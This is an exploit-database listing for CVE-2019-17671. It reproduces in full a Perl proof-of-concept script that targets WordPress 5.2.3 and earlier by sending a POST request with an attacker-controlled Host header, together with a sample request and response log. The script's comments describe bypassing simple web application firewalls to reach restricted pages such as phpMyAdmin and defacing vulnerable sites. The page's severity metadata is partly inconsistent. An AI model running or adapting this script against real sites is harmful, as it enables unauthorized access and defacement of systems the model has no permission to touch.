Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2019-17671 | CWE-352 | Not specified | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
ExploitAlert Team | High | Remote | 2019-09-08 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/S:U/C:H/I:H/A:N |
#!/usr/bin/perl -w # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Type: Remote # Risk: High # # Solution: # Set security headers to web server and no-cache for Cache-Control # # Simple Attack Scenarios: # # o This attack can bypass Simple WAF to access restricted content on the web server, # something like phpMyAdmin; # # o This attack can deface the vulnerable Wordpress website with content from the default vhost; # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit ## ==================================================================================== ## Author: Todor Donev 2019 (c) <todor.donev at gmail.com> ## > Host => default-vhost.com ## > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) ## > Content-Type => application/x-www-form-urlencoded ## < Connection => close ## < Date => Fri, 06 Sep 2019 11:39:43 GMT ## < Location => https://default-vhost.com/ ## < Server => nginx ## < Content-Type => text/html; charset=UTF-8 ## < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT ## < Client-Peer => 13.37.13.37:443 ## < Client-Response-Num => 1 ## < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 ## < Client-SSL-Cert-Subject => /CN=default-vhost.com ## < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 ## < Client-SSL-Socket-Class => IO::Socket::SSL ## < Client-SSL-Warning => Peer certificate not verified ## < Client-Transfer-Encoding => chunked ## < Strict-Transport-Security => max-age=31536000; ## < X-Powered-By => PHP/7.3.9 ## < X-Redirect-By => WordPress ## ==================================================================================== # # # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $attacker = shift || 'default-vhost.com'; say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>"; if ($host !~ m/^http/){ say "# e.g. perl $0 https://target:port/ default-vhost.com"; exit; } my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); $request->header("Host" => $attacker); my $response = $browser->request($request); say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); say "# > $_ => ", $request->header($_) for $request->header_field_names; say "# < $_ => ", $response->header($_) for $response->header_field_names; say "# ====================================================================================";
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.